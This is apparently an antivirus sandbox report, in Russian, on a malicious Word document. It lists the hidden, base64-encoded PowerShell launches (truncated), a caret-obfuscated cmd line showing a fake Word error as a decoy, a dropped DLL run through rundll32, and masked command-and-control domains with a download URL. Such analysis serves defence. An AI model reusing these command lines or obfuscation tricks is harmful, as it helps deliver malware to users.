Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\c3re5c3\di_p3c9\o_5z.dll
Сетевая активность
Подключается к
- 'gi#####hanksdaily.com':80
- 'gi#####hanksdaily.com':443
- 'x1.#.lencr.org':80
- 'so##nap.com':443
TCP
Запросы HTTP GET
- http://gi#####hanksdaily.com/qlE/VeF/
Другие
- 'gi#####hanksdaily.com':443
- 'so##nap.com':443
UDP
- DNS ASK pe###ilm.com
- DNS ASK gi#####hanksdaily.com
- DNS ASK x1.#.lencr.org
- DNS ASK wa#.##onglisc.com
- DNS ASK fn##q.com
- DNS ASK sa######aninarijeevika.com
- DNS ASK zi#####.teleskopstore.com
- DNS ASK so##nap.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAM...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\C3re5c3\Di_p3c9\O_5Z.dll,Control_RunDLL
